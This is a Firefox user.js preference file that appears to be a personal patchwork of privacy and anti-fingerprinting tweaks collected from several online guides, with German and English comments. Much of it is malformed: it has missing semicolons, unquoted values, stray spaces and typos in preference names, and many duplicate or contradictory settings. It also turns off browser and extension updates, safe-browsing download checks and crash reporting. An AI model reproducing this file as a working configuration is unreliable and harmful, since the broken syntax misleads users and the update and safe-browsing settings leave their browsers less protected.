PREF: Set the default search engine to DuckDuckGo (disabled) // https://support.mozilla.org/en-US/questions/948134 user_pref("browser.search.defaultenginename", "Wikipedia (en)"); user_pref("browser.search.order.1", ""); user_pref("keyword.URL", ""); // PREF: Disable GeoIP lookup on your address to set default search engine region // https://trac.torproject.org/projects/tor/ticket/16254 // https://support.mozilla.org/en-US/kb/how-stop-firefox-making-automatic-connections#w_geolocation-for-default-search-engine user_pref("browser.search.countryCode", "US"); user_pref("browser.search.region", "US"); user_pref("browser.search.geoip.url", ""); // PREF: Set Accept-Language HTTP header to en-US regardless of Firefox localization // https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Accept-Language user_pref("intl.accept_languages", "en-US"); user_pref("intl.charset.fallback.override", "UTF-8"); // PREF: Don´t use OS values to determine locale, force using Firefox locale setting // http://kb.mozillazine.org/Intl.locale.matchOS user_pref("intl.locale.matchOS", false); // PREF: Don´t use Mozilla-provided location-specific search engines user_pref("browser.search.geoSpecificDefaults", false); // PREF: Do not automatically send selection to clipboard on some Linux platforms // http://kb.mozillazine.org/Clipboard.autocopy user_pref("clipboard.autocopy", false); // PREF: Prevent leaking application locale/date format using JavaScript // https://bugzilla.mozilla.org/show_bug.cgi?id=867501 // https://hg.mozilla.org/mozilla-central/rev/52d635f2b33d user_pref("javascript.use_us_english_locale", true); // PREF: Do not submit invalid URIs entered in the address bar to the default search engine // http://kb.mozillazine.org/Keyword.enabled user_pref("keyword.enabled", false); // PREF: Don´t trim HTTP off of URLs in the address bar. // https://bugzilla.mozilla.org/show_bug.cgi?id=665580 // Riesen-Änderung bei Firefox: Mozilla-Browser schafft Teil der URL ab (falls true) // https://www.chip.de/news/Riesen-Aenderung-bei-Firefox-Jetzt-schafft-auch-der-Mozilla-Browser-die-URL-ab_182514886.html user_pref("browser.urlbar.trimURLs", false); // PREF: Don´t try to guess domain names when entering an invalid domain name in URL bar // http://www-archive.mozilla.org/docs/end-user/domain-guessing.html user_pref("browser.fixup.alternate.enabled", false); // PREF: When browser.fixup.alternate.enabled is enabled, strip password from ´user:password@...´ URLs // https://github.com/pyllyukko/user.js/issues/290#issuecomment-303560851 user_pref("browser.fixup.hide_user_pass", true); // PREF: Send DNS request through SOCKS when SOCKS proxying is in use // https://trac.torproject.org/projects/tor/wiki/doc/TorifyHOWTO/WebBrowsers //user_pref("NETWORK.PROXY.SOCKS_REMOTE_DNS", false); // PREF: Don´t monitor OS online/offline connection state // https://trac.torproject.org/projects/tor/ticket/18945 user_pref("network.manage-offline-status", false); // PREF: Enforce Mixed Active Content Blocking // https://support.mozilla.org/t5/Protect-your-privacy/Mixed-content-blocking-in-Firefox/ta-p/10990 // https://developer.mozilla.org/en-US/docs/Site_Compatibility_for_Firefox_23#Non-SSL_contents_on_SSL_pages_are_blocked_by_default // https://blog.mozilla.org/tanvi/2013/04/10/mixed-content-blocking-enabled-in-firefox-23/ user_pref("security.mixed_content.block_active_content", true); // PREF: Enforce Mixed Passive Content blocking (a.k.a. Mixed Display Content) // NOTICE: Enabling Mixed Display Content blocking can prevent images/styles... from loading properly when connection to the website is only partially secured user_pref("security.mixed_content.block_display_content", false); // PREF: Disable JAR from opening Unsafe File Types // http://kb.mozillazine.org/Network.jar.open-unsafe-types // CIS Mozilla Firefox 24 ESR v1.0.0 - 3.7 user_pref("network.jar.open-unsafe-types", false); // CIS 2.7.4 Disable Scripting of Plugins by JavaScript // http://forums.mozillazine.org/viewtopic.php?f=7&t=153889 user_pref("security.xpconnect.plugin.unrestricted", false); // PREF: Set File URI Origin Policy // http://kb.mozillazine.org/Security.fileuri.strict_origin_policy // CIS Mozilla Firefox 24 ESR v1.0.0 - 3.8 user_pref("security.fileuri.strict_origin_policy", true); // PREF: Disable Displaying Javascript in History URLs // http://kb.mozillazine.org/Browser.urlbar.filter.javascript // CIS 2.3.6 user_pref("browser.urlbar.filter.javascript", true); // PREF: Disable asm.js // http://asmjs.org/ // https://www.mozilla.org/en-US/security/advisories/mfsa2015-29/ // https://www.mozilla.org/en-US/security/advisories/mfsa2015-50/ // https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2712 user_pref("javascript.options.asmjs", false); // PREF: Disable SVG in OpenType fonts // https://wiki.mozilla.org/SVGOpenTypeFonts // https://github.com/iSECPartners/publications/tree/master/reports/Tor%20Browser%20Bundle user_pref("gfx.font_rendering.opentype_svg.enabled", false); // PREF: Disable in-content SVG rendering (Firefox>= 53) // NOTICE: Disabling SVG support breaks many UI elements on many sites // https://bugzilla.mozilla.org/show_bug.cgi?id=1216893 // https://github.com/iSECPartners/publications/raw/master/ reports/Tor%20Browser%20Bundle/Tor%20Browser%20 Bundle%20-%20iSEC%20Deliverable%20 1.3.pdf#16 user_pref("svg.disabled", false); // PREF: Disable video stats to reduce fingerprinting threat // https://bugzilla.mozilla.org/show_bug.cgi?id=654550 // https://github.com/pyllyukko/user.js/issues/9#issuecomment-100468785 // https://github.com/pyllyukko/user.js/issues/9#issuecomment-148922065 user_pref("media.video_stats.enabled", false); // PREF: Don´t reveal build ID // Value taken from Tor Browser // https://bugzilla.mozilla.org/show_bug.cgi?id=583181 user_pref("general.buildID.override", "20100101"); user_pref("browser.startup.homepage_override.buildID" , "20100101"); // PREF: Prevent font fingerprinting // https://browserleaks.com/fonts // https://github.com/pyllyukko/user.js/issues/120 // from https://www.privacy-handbuch.de/handbuch_21q.htm // Informationen über installierte Schriftarten (Fonts) können mit Javascript, Flash oder Java ausgelesen und zur Berechnung eines // individuellen Fingerprint des Browsers genutzt werden. user_pref("browser.display.use_document_fonts", 0); user_pref("font.blacklist.underline_offset", ""); user_pref("javascript.options.wasm", false); user_pref("javascript.options.wasm_baselinejit", false); // // from wiki.kairaven.de: // user_pref("font.blacklist.underline_offset",""); user_pref("gfx.downloadable_fonts.enabled", false); user_pref("gfx.downloadable_fonts.woff2.enabled", false); user_pref("layout.css.font-loading-api.enabled", false); user_pref("gfx.downloadable_fonts.disable_cache", true); user_pref("gfx.font_rendering.graphite.enabled", false); user_pref("layout.css.prefixes.font-features", false); user_pref("general.useragent.locale","en-US"); user_pref("intl.accept_languages","en-US"); user_pref("javascript.use_us_english_locale", true); user_pref("network.http.accept-encoding", "gzip, deflate"); user_pref("browser.cache.disk.capacity", 0); user_pref("browser.cache.disk.enable", false); user_pref("browser.cache.disk.smart_size.enabled", false); user_pref("browser.cache.disk_cache_ssl", false); user_pref("browser.cache.memory.enable", false); user_pref("browser.cache.offline.capacity", 0); user_pref("browser.cache.offline.enable", false); user_pref("browser.disk.free_space_hard_limit", 1); user_pref("browser.disk.free_space_soft_limit", 1); user_pref("browser.disk.max_chunks_memory_usage", 1); user_pref("browser.disk.max_entry_size", 4); user_pref("browser.disk. max_priority_chunks_memory_usage", 4); user_pref("browser.disk.metadata_memory_limit", 5); user_pref("browser.disk.parent_directory", "/tmp"); user_pref("browser.cache.disk.smart_size.enabled", false); user_pref("browser.cache.disk.smart_size.firt_run", false); user_pref("browser.cache.disk.cache_ssl", false); user_pref("browser.cache.frecency_experiment", 1); user_pref("browser.cache.memory.max_entery_size", 0); user_pref("browser.cache.offline.capacity", 0); user_pref("browser.cache.offline.enable", false); user_pref("dom.caches.enabled", false); user_pref("extensions.getAddons.cache.enabled", false); user_pref("gfx.canvas.skiagl.dynamic-cache", false); user_pref("gfx.downloadable_fonts.disable_cache", true); user_pref("image.cache.size", 0); user_pref("media.cache_size", 0); user_pref("network.buffer.cache.count", 4); user_pref("network.buffer.cache.size", 512); user_pref("devtools.cache.disabled", true); user_pref("dom.caches.enabled", false); user_pref("media.cache_size", 0); user_pref("offline-apps.allow_by_default", false); user_pref("signon.formlessCapture.enabled", false); user_pref("browser.safebrowsing.blockedURIs.enabled", false); user_pref("browser.safebrowsing.downloads. remote.enabled", false); user_pref("dom.ipc.plugins.enabled", false); user_pref("dom.ipc.plugins.enabled.pname.dll/so", false); user_pref("dom.ipc.plugins.timeoutSecs", -1); user_pref("media.eme.enabled", false); user_pref("media.gmp-gmpopenh264.abi",""); user_pref("media.gmp-gmpopenh264.version",""); user_pref("media.gmp.storage.version.observed", 0); user_pref("media.eme.apiVisible", false); user_pref("browser.startup.homepage_override. buildID", 0); user_pref("browser.eme.ui.enabled ", true); user_pref("plugin.default.state", 0); user_pref("plugin.defaultXpi.state", 0); user_pref("browser.safebrowsing.downloads.enabled", false); user_pref("browser.tabs.opentabfor.middleclick", true); user_pref("browser.search.openintab", true); user_pref("browser.taskbar.previews.enable", true); user_pref("config.trim_on_minimize", true); user_pref("middlemouse.paste", true); user_pref("browser.fixup.alternate.suffix", ".com"); user_pref("network.cookie.lifetime.days", 1); user_pref("network.dnsCacheExpiration", 9); user_pref("browser.send_pings", false); user_pref("network.dns.disableIPv6", true); user_pref("network.protocol-handler.expose.ftp", false); user_pref("network.protocol-handler.external.ftp", true); // // Pale Moon Extension: Block Content Download (mdsy) // user_pref("extensions.mdsy.block.script", false); user_pref("extensions.mdsy.block.xhr", true); user_pref("extensions.mdsy.block.image", false); user_pref("extensions.mdsy.block.media", true); user_pref("extensions.mdsy.block.object", true); user_pref("extensions.mdsy.block.font", true); user_pref("extensions.mdsy.block.style", false); user_pref("permissions.default.image", 3); user_pref("permissions.default.object", 2); user_pref("permissions.default.script", 3); user_pref("permissions.default.stylesheet", 3); user_pref("permissions.default.subdocument", 3); // //firecamp.de // user_pref("useragentswitcher.1.appname", "Microsoft Internet Explorer"); user_pref("useragentswitcher.1.appversion", "4.0 (compatible; MSIE 6.0; Windows NT 5.1)"); user_pref("useragentswitcher.1.description", "Internet Explorer 6 (Windows XP)"); user_pref("useragentswitcher.1.platform", "Win32"); user_pref("useragentswitcher.1.useragent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"); user_pref("useragentswitcher.2.appname", "Netscape"); user_pref("useragentswitcher.2.appversion", "4.8 [de] (Windows NT 5.1; U)"); user_pref("useragentswitcher.2.description", "Netscape 4.8 (Windows XP)"); user_pref("useragentswitcher.2.platform", "Win32"); user_pref("useragentswitcher.2.useragent", "Mozilla/4.8 [de] (Windows NT 5.1; U)"); user_pref("useragentswitcher.3.appname", "Opera"); user_pref("useragentswitcher.3.appversion", "7.54 (Windows NT 5.1; U)"); user_pref("useragentswitcher.3.description", "Opera 7.54 (Windows XP)"); user_pref("useragentswitcher.3.platform", "Win32"); user_pref("useragentswitcher.3.useragent", "Opera/7.54 (Windows NT 5.1; U) [de]"); user_pref("useragentswitcher.menu.hide", false); user_pref("useragentswitcher.reset.onclose", false); user_pref("useragentswitcher.user.agents.count", 3); user_pref("accessibility.typeaheadfind", false); user_pref("accessibility.typeaheadfind.flashBar", 0); user_pref("browser.display.screen_resolution", 96); user_pref("browser.history_expire_days", 1); user_pref("browser.link.open_external", 2); user_pref("browser.xul.error_pages.enabled", false); user_pref("extensions.update.lastUpdateDate", 1099489430); user_pref("browser.download.dir", "/tmp2"); user_pref("browser.dom.window.dump.enabled", false); user_pref("browser.offline", false); user_pref("browser.preferences.lastpanel", 5); user_pref("browser.search.selectedEngine"; ""); user_pref("browser.tabs.loadInBackground", false); user_pref("downloadmgr.showWhenStarting", true); user_pref("javascript.options.parallel.parsing", false); user_pref("javascript.options.strict", true); user_pref("javascript.options.native_regexp", true); user_pref("javascript.options.mem.gc_per_zone", true); user_pref("javascript.options.mem. gc_refresh_frame_slices_enabled" , true); user_pref("font.internaluseonly.changed", false); user_pref("privacy.cpd.formdata", true); user_pref("privacy.donottrackheader.enabled", true); user_pref("privacy.popups.showBrowserMessage", false); user_pref("privacy.sanitize.migrateFx3Prefs", true); user_pref("privacy.sanitize.timeSpan", 0); user_pref("privacy.firstparty.isolate", true); // ff>=58 once more against Canvas Fingerprinting user_pref("services.sync.declinedEngines", ""); user_pref("storage.vacuum.last.index", 1); user_pref("storage.vacuum.last.places.sqlite", 1509303910); user_pref("network.http.max-connections", 32); user_pref("browser.cache. disk.parent_directory" "/tmp"); // siehe /etc/fstab user_pref("browser.download.importedFromSqlite", true); // * user_pref("extensions.checkCompatibility", false); user_pref("browser.sessionstore.resume_session_once", false); user_pref("browser.sessionstore. upgradeBackup.latestBuildID", "0"); user_pref("browser.urlbar.matchBehavior", 2); user_pref("browser.urlbar.matchOnlyTyped", true); user_pref("browser.urlbar.maxRichResults", 0); user_pref("gestures.enable_single_finger_input", false); // // https://www.philognosie.net/internet firefox-einstellungen-aboutconfig-praktische-filter-tipps?page=2 // user_pref("accessibility.typeahead.flashBar", 0); user_pref("app.releaseNotesURL", ""); user_pref("app.support.baseURL", ""); user_pref("app.update.enabled", false); user_pref("app.update.url", ""); user_pref("app.update.url.details", ""); user_pref("app.update.url.manual", ""); user_pref("app.vendorURL", ""); user_pref("browser.allTabs.previews", false); user_pref("browser.autofocus", false); user_pref("browser.bookmarks. restore_default_bookmarks", false); user_pref("browser.cache.disk.capacity", 0); user_pref("browser.cache.disk.filesystem_reported", 0); user_pref("browser.cache.disk. smart_size.enabled", false); user_pref("browser.cache.disk. smart_size.first_run", false); user_pref("browser.cache.disk. smart_size.use_old_max", false); user_pref("browser.cache.disk_cache_ssl", false); user_pref("browser.cache.memory.enable", false); user_pref("browser.cache.offline.capacity", 0); user_pref("browser.cache.offline.enable", false); user_pref("browser.contentHandlers.types.0.uri", ""); user_pref("browser.ctrlTab.previews", false); user_pref("browser.dictionaries.download.url", ""); user_pref("browser.display.use_document_fonts", 0); user_pref("browser.download.dir", /tmp); user_pref("browser.download.folderList", 2); user_pref("browser.download.importedFromSqlite", true); user_pref("browser.download.panel.shown", true); user_pref("browser.download.useDownloadDir", true); user_pref("browser.feedback.url", ""); user_pref("devtools.memory.enabled", false); user_pref("devtools.errorconsole.enabled", false); user_pref("devtools.device.url", ""); user_pref("devtools.browserconsole.filter. sharedworkers", false); user_pref("clipboard.autocopy", false); user_pref("captivedetect.canonicalURL", ""); user_pref("network.http.keep-alive.timeout", 115); user_pref("network.http.connection-timeout", 90); user_pref("network.http:connection-retry-timeout", 250); user_pref("dom.disable_window_ open_feature.menubar", true); user_pref("keyword.enabled", false); user_pref("browser.urlbar.maxRichResults", 0); user_pref("browser.urlbar.clickSelectsAll", false); user_pref("browser.backspace_action", 2); user_pref("general.smoothScroll", true); user_pref("browser.showQuitWarning", false); user_pref("Browser.download. saveLinkAsFilenameTimeout", 4000); user_pref("accessibility.typeaheadfind", true); user_pref("accessibility.typeaheadfind.flashBar", 0); user_pref("app.releaseNotesURL", ""); user_pref("app.support.baseURL", ""); user_pref("app.update.backgroundErrors", 1); user_pref("app.update.backgroundMaxErrors", 1); user_pref("app.vendorURL", ""); user_pref("breakpad.reportURL", ""); user_pref("browser.allTabs.previews", false); user_pref("browser.autofocus", false); user_pref("browser.bookmarks.restore_default_bookmarks", false); user_pref("browser.cache.disk.filesystem_reported", 1); user_pref("browser.cache.disk.parent_directory", "/tmp"); user_pref("browser.cache.disk.smart_size.enabled", false); user_pref("browser.cache.disk.smart_size.first_run", false); user_pref("browser.cache.disk.smart_size.use_old_max", false); user_pref("image.cache.size", 0); user_pref("browser.contentHandlers.types.0.uri", ""); user_pref("browser.crashReports. unsubmittedCheck.enabled", false); user_pref("browser.ctrlTab.previews", false); user_pref("browser.dictionaries.download.url", ""); user_pref("browser.display.screen_resolution", 96); user_pref("browser.download.folderList", 2); user_pref("browser.download.importedFromSqlite", true); user_pref("browser.download.panel.shown", false); user_pref("browser.download.save_converter_index", 0); user_pref("browser.download.useDownloadDir", true); user_pref("browser.feedback.url", ""); user_pref("browser.fixup.alternate.enabled", false); user_pref("browser.formfill.saveHttpsForms", false); user_pref("browser.fullscreen.animateUp", 0); user_pref("browser.fullscreen.autohide", false); user_pref("browser.geolocation.warning.infoURL", ""); user_pref("browser.getdevtools.url", ""); user_pref("browser.history_expire_days", 1); user_pref("browser.link.open_external", 2); user_pref("browser.link.open_newwindow", 1); user_pref("browser.link.open_newwindow. disabled_in_fullscreen", false); user_pref("browser.link.open_newwindow.restriction", 0); user_pref("browser.migration.version", 19); user_pref("browser.mixedcontent.warning.infoURL", ""); user_pref("browser.newtab.choice", 0); user_pref("browser.newtab.url", "about:blank"); user_pref("browser.newtabpage.columns", 0); user_pref("browser.newtabpage.enabled", true); user_pref("browser.newtabpage.rows", 0); user_pref("browser.newtabpage.storageVersion", 1); user_pref("browser.offline", false); user_pref("browser.pagethumbnails.storage_version", 3); user_pref("browser.places.smartBookmarksVersion", 4); user_pref("browser.preferences. advanced.selectedTabIndex", 2); user_pref("browser.preferences.lastpanel", 5); user_pref("browser.preferences.privacy. selectedTabIndex", 2); user_pref("browser.privatebrowsing.autostart", true); user_pref("browser.safebrowsing.blockedURIs.enabled", true); user_pref("browser.safebrowsing.downloads.remote.enabled", false); user_pref("browser.search.countryCode", "US"); user_pref("browser.search.geoip.timeout", 1); user_pref("browser.search.geoip.url", ""); user_pref("browser.search.order.1", ""); user_pref("browser.search.region", "US"); user_pref("browser.search.searchEnginesURL", ""); user_pref("browser.search.selectedEngine", ""); user_pref("browser.search.suggest.enabled", false); user_pref("browser.search.update", false); user_pref("browser.search.useDBForOrder", true); user_pref("browser.selfsupport.enabled", false); user_pref("browser.selfsupport.url", ""); user_pref("browser.send_pings.max_per_link", 0); user_pref("browser.sessionhistory.max_entries", 5); user_pref("browser.sessionhistory. max_total_viewers", -1); user_pref("browser.sessionstore.privacy level", 2); user_pref("browser.shell.checkDefaultBrowser", false); user_pref("browser.slowStartup.averageTime", 0); user_pref("browser.slowStartup.maxSamples", 0); user_pref("browser.slowStartup.notificationDisabled", true); user_pref("browser.slowStartup.samples", 0); user_pref("browser.slowstartup.help.url", ""); user_pref("browser.startup.homepage", "about::blank"); user_pref("browser.ustartup.homepage_ override.mstone", "ignore"); user_pref("browser.startup.page", 0); user_pref("browser.syncPromoViewsLeftMap", "{"addons":0,"bookmarks":0}"); user_pref("browser.tabs.closeWindowWithLastTab", false); user_pref("browser.tabs.crashReporting. sendReport", false); user_pref("browser.tabs.loadInBackground", false); user_pref("browser.taskbar.previews.enable", true); user_pref("browser.trackingprotection.gethashURL", ""); user_pref("browser.trackingprotection.updateURL", ""); user_pref("browser.urlbar.clickSelectsAll", false); user_pref("browser.urlbar.matchBehavior", 2); user_pref("browser.urlbar.matchOnlyTyped", true); user_pref("browser.urlbar.maxRichResults", 0); user_pref("browser.urlbar.suggest.bookmark", false); user_pref("browser.xul.error_pages.enabled", false); user_pref("browser.zoom.siteSpecific", false); user_pref("camera.control.face_detection.enabled", false); user_pref("clipboard.autocopy", false); user_pref("config.trim_on_minimize", true); user_pref("device.sensors.enabled", false); user_pref("devtools.browserconcole.filter.csslog", false); user_pref("devtools.devedition.promo.url", ""); user_pref("devtools.gcli.jquerySrc", ""); user_pref("devtools.gcli.lodashSrc", ""); user_pref("devtools.gcli.underscoreSrc", ""); user_pref("devtools.telemetry.tools.opened.version", "{}"); user_pref("devtools.toolbox.selectedTool", "inspector"); user_pref("devtools.toolsidebar-height.inspector", 350); user_pref("devtools.toolsidebar-width.inspector", 350); user_pref("devtools.webconsole.filter. csslogbrowserconcole. filter.csslog", false); user_pref("disabletarget.extensions", "zip rar exe tar jar xpi gzip gz ace bin"); user_pref("dom.allow_cut_copy", false); user_pref("dom.disable_window_move_resize", true); user_pref("dom.disable_window_open_feature.close", true); user_pref("dom.disable_window_open_feature.menubar", true); user_pref("dom.disable_window_open_feature.minimizable", true); user_pref("dom.disable_window_open_feature.personalbar", true); user_pref("dom.disable_window_open_feature.scrollbars", true); user_pref("dom.disable_window_open_feature.titlebar", true); user_pref("dom.disable_window_open_feature.toolbar", true); user_pref("dom.enable_performance", false); user_pref("dom.enable_resource_timing", false); user_pref("dom.enable_user_timing", false); user_pref("dom.event.contextmenu.enabled", false); user_pref("dom.gamepad.enabled", false); user_pref("dom.idle-observers-api.enabled", false); user_pref("dom.indexedDB.enabled", false); user_pref("dom.ipc.plugins.enabled.pname.dll/so", false); user_pref("dom.ipc.plugins.timeoutSecs", -1); user_pref("dom.keyboardevent.code.enabled", false); user_pref("dom.maxHardwareConcurrency", 2); user_pref("dom.mozApps.signed_apps_ installable_from", ""); user_pref("dom.mozInputMethod.enabled", false); user_pref("dom.mozTCPSocket.enabled", false); user_pref("dom.network.enabled", false); user_pref("dom.popup_allowed_events", "change click dblclick mouseup pointerup notificationclick reset submit touchend"); user_pref("dom.popup_maximum", 1); user_pref("dom.server-events.enabled", false); user_pref("dom.storage.enabled", false); user_pref("dom.vibrator.enabled", false); user_pref("dom.webaudio.enabled", false); user_pref("dom.webnotifications.enabled", false); user_pref("dom.workers.enabled", false); user_pref("downloadmgr.showWhenStarting", true); user_pref("experiments.enabled", false); user_pref("experiments.manifest.uri", ""); user_pref("experiments.supported", false); user_pref("font.default.x-western", "serif") user_pref("font.name.serif.x-western", "serif"); user_pref("font.name.sans-serif.x-western", "serif") user_pref("font.name.monospace.x-western", "serif") user_pref("network.allow-experiments", false); // //https://www.thewindowsclub.com/mozilla-firefox-about-config-tweaks // user_pref("browser.tabs. insertRelatedAfterCurrent", true); user_pref("browser.ctrlTab.previews", false); user_pref("network.prefetch-next", false); user_pref("browser.tabs.animate", true); user_pref("browser.urlbar.clickSelectsAll", false); user_pref("browser.tabs.animate", true); // // https://www.szenebox.org/15-gefaellt-mir/6709-firefox-richtig-einstellen/ // user_pref("browser.safebrowsing.downloads. enabled", false); user_pref("datareporting.healthreport. uploadEnabled", false); user_pref("datareporting.policy. dataSubmissionEnabled", false); user_pref("falsedatareporting.policy. dataSubmissionEnabled", false); user_pref("browser.selfsupport.url", ""); // user_pref("services.sync.engine.tabs", false); user_pref("services.sync.engineStatusChanged. addons", true); user_pref("services.sync.engineStatusChanged. bookmarks", true); user_pref("services.sync.engineStatusChanged. history", true); user_pref("services.sync.engineStatusChanged. passwords", true); user_pref("services.sync.engineStatusChanged. prefs", true); user_pref("services.sync.engineStatusChanged. tabs", true); user_pref("services.sync.fxa.privacyURL", ""); user_pref("services.sync.fxa.termsURL", ""); user_pref("services.sync.jpake.serverURL", ""); user_pref("services.sync.migrated", true); user_pref("services.sync.nextSync", 0); user_pref("services.sync.prefs.sync.browser. safebrowsing.malware.enabled", false); user_pref("services.sync.prefs.sync.browser. safebrowsing.phishing.enabled", false); user_pref("services.sync.prefs.sync.browser. search.update", false); user_pref("services.sync.prefs.sync.browser. sessionstore.restore_on_demand", false); user_pref("services.sync.prefs.sync.browser. urlbar.autocomplete.enabled", false); user_pref("services.sync.prefs.sync.browser. urlbar.suggest.searches", false); user_pref("services.sync.prefs.sync.network. cookie.thirdparty.sessionOnly", false); user_pref("services.sync.prefs.sync.spellchecker.dictionary", false); user_pref("services.sync.privacyURL", ""); user_pref("services.sync.serverURL", ""); user_pref("services.sync.tabs.lastSync", 0); user_pref("services.sync.tabs.lastSyncLocal", 0); user_pref("services.sync.addons. trustedSourceHostnames", ""); user_pref("services.sync.clients.lastSync", 0); user_pref("services.sync.clients.lastSyncLocal", 0); user_pref("services.sync.declinedEngines", ""); user_pref("services.sync.engine.addons", false); user_pref("services.sync.engine.bookmarks", false); user_pref("services.sync.engine.history", false); user_pref("services.sync.engine.passwords", false); user_pref("services.sync.engine.prefs", false); user_pref("services.sync.engine.tabs", false); // //https://www.maketecheasier.com/28-coolest-firefox-aboutconfig-tricks/ // user_pref("browser.sessionhistory.max_total_viewers", 0); user_pref("network.http.max-connections-per-server", 8); user_pref("network.http.proxy.pipelining", false); // eventl. true user_pref("browser.urlbar.clickSelectsAll", false); user_pref("zoom.maxPercent", 300); user_pref("zoom.minPercent", 30); user_pref("security.dialog_enable_delay", 0); user_pref("view_source.editor.external", false); user_pref("view_source.editor.path", ""); user_pref("Browser.download.saveLinkAsFilenameTimeout", 4000); user_pref("browser.fullscreen.autohide", false); user_pref("extensions.getAddons.maxResults", 15); user_pref("media.getusermedia.screensharing. allowed_domains", ""); // www.ciscoparks.com, ... // // CHIP, https://www.chip.de/news/Firefox-Diese-Features-kennen-Sie-noch-nicht_93266205.html // user_pref("browser.tabs. loadBookmarksInTabs", true); user_pref("findbar.modalHighlight", true); user_pref("indbar.highlightAll", true); user_pref("privacy.resistFingerprinting", true); // // PREF: Enable only whitelisted URL protocol handlers // PREF: Enable only whitelisted URL protocol handlers // http://kb.mozillazine.org/Network.protocol-handler.external-default // http://kb.mozillazine.org/Network.protocol-handler.warn-external-default // http://kb.mozillazine.org/Network.protocol-handler.expose.%28protocol%29 // https://news.ycombinator.com/item?id=13047883 // https://bugzilla.mozilla.org/show_bug.cgi?id=167475 // https://github.com/pyllyukko/user.js/pull/285#issuecomment-298124005 // NOTICE: Disabling nonessential protocols breaks all interaction with custom protocols such as mailto:, irc:, magnet: ... and breaks opening third-party mail/messaging/torrent/... clients when clicking on links with these protocols // TODO: Add externally-handled protocols from Windows 8.1 and Windows 10 (currently contains protocols only from Linux and Windows 7) that might pose a similar threat (see e.g. https://news.ycombinator.com/item?id=13044991) // TODO: Add externally-handled protocols from Mac OS X that might pose a similar threat (see e.g. https://news.ycombinator.com/item?id=13044991) // If you want to enable a protocol, set network.protocol-handler.expose.(protocol) to true and network.protocol-handler.external.(protocol) to: // * true, if the protocol should be handled by an external application // * false, if the protocol should be handled internally by Firefox user_pref("network.protocol-handler. warn-external-default", true); user_pref("network.protocol-handler. external.http", false); user_pref("network.protocol-handler. external.https", false); user_pref("network.protocol-handler. external.javascript", false); user_pref("network.protocol-handler. external.moz-extension", false); user_pref("network.protocol-handler. external.ftp", true); user_pref("network.protocol-handler. external.file", false); user_pref("network.protocol-handler. external.about", false); user_pref("network.protocol-handler. external.chrome", false); user_pref("network.protocol-handler. external.blob", false); user_pref("network.protocol-handler. external.data", false); user_pref("network.protocol-handler. expose-all", false); user_pref("network.protocol-handler. expose.http", false); user_pref("network.protocol-handler. expose.https", false); user_pref("network.protocol-handler. expose.javascript", false); user_pref("network.protocol-handler. expose.moz-extension", false); user_pref("network.protocol-handler. expose.ftp", false); user_pref("network.protocol-handler. expose.file", false); user_pref("network.protocol-handler. expose.about", false); user_pref("network.protocol-handler. expose.chrome", false); user_pref("network.protocol-handler. expose.blob", false); user_pref("network.protocol-handler. expose.data", false); user_pref("browser.sessionhistory. max_entries", 5); user_pref("dom.ipc.plugins. processLaunchTimeoutSecs", 45); user_pref("network.http.pipelining.ssl", false); user_pref("network.negotiate-auth. using-native-gsslib", true); user_pref("network.predictor.enable-hover-on-ssl", true); user_pref("security.ssl.enable_alpn", true); user_pref("security.ssl.enable_false_start", true); user_pref("security.ssl.enable_npn", true); user_pref("security.ssl.errorReporting.automatic", false); user_pref("security.ssl.false_start.require-npn", false); user_pref("security.ssl.require_safe_negotiation", true); // https://wiki.gentoo.org/wiki/Firefox user_pref("security.ssl.treat_unsafe_ negotiation_as_broken", false); //https://wiki.gentoo.org/wiki/Firefox user_pref("security.ssl.enable_alpn", true); user_pref("webchannel.allowObject. urlWhitelist" ""); user_pref("clipboard.plainTextOnly", true); user_pref("devtools.remote.wifi.scan", false); user_pref("toolkit.cosmeticAnimations.enabled", false); user_pref("dom.battery.enabled", false); user_pref("dom.disable_window_*", true); user_pref("dom.event.clipboardevents.enabled", false); user_pref("dom.gamepad.*.enabled", false); user_pref("dom.mapped_arraybuffer.enabled", false); user_pref("offline-apps.quota.warn", false); user_pref("dom.w3c_touch_events.enabled", false); user_pref("dom.webkitBlink.filesystem.enabled", false); // // https://www.ghacks.net/2015/08/ 18/a-comprehensive-list-of-firefox- privacy-and-security-settings/ // user_pref("extensions.update.enabled", false); user_pref("toolkit.telemetry.cachedClientID", ""); // 0360: disable new tab tile ads & preload &marketing junk user_pref("browser.newtab.preload", false); user_pref("browser.newtabpage. directory.ping", "data:text/plain,"); user_pref("browser.newtabpage. directory.source", "data:text/plain,"); user_pref("browser.newtabpage. enabled", false); user_pref("browser.newtabpage. enhanced", false); user_pref("browser.newtabpage. introShown", true); // 0203: disable using OS locale, force APP locale user_pref("intl.locale.matchOS", false); // 0204: set APP local user_pref("general.useragent.locale", "en-US"); // 0100: STARTUP user_pref("ghacks_user.js.parrot", " // 0100 syntax error: the parrot´s dead!"); // 0101: disable "slow startup" options // warnings, disk history, welcomes, intros, EULA, default browser check user_pref("browser.slowStartup. notificationDisabled", true); user_pref("browser.slowStartup. maxSamples", 0); user_pref("browser.slowStartup.samples", 0); user_pref("browser.rights.3.shown", true); user_pref("browser.startup. homepage_override.mstone", "ignore"); user_pref("startup.homepage_ welcome_url", ""); user_pref("startup.homepage_ welcome_url.additional", ""); user_pref("startup.homepage_ override_url", ""); user_pref("browser.laterrun.enabled", false); user_pref("browser.shell.check DefaultBrowser", false); user_pref("browser.usedOnWindows10. introURL", ""); // 0102: set start page (0=blank, 1=home, 2=last visited page, 3=resume previous session) // home = browser.startup.homepage preference // You can set all of this from Options>General>Startup user_pref("browser.startup.page", 0); user_pref("geo.wifi.xhr.timeout", 1); user_pref("browser.search.geoip.timeout", 1); // 0206: disable geographically specific results/search engines eg: "browser.search.*.US" // i.e ignore all of Mozilla´s multiple deals with multiple engines in multiple locales user_pref("browser.search.geoSpecificDefaults", false); user_pref("browser.search.geoSpecificDefaults.url", ""); // 0370: disable "Snippets" (Mozilla content shown on about:home screen) // https://wiki.mozilla.org/Firefox/Projects/Firefox_Start/Snippet_Service // MUST use HTTPS - arbitrary content injected into this page via http opens up MiTM attacks user_pref("browser.aboutHomeSnippets.updateUrl", "https://127.0.0.1"); user_pref("browser.link.open_newwindow", 3); // 3010: enable ctrl-tab previews user_pref("browser.ctrlTab.previews", false); // 3012: spellchecking: 0=none, 1-multi-line controls, 2=multi-line &single-line controls user_pref("layout.spellcheckDefault", 0); // 3011: don´t open "page/selection source" in a tab. The window used instead is cleaner // and easier to use and move around (eg developers/multi-screen). 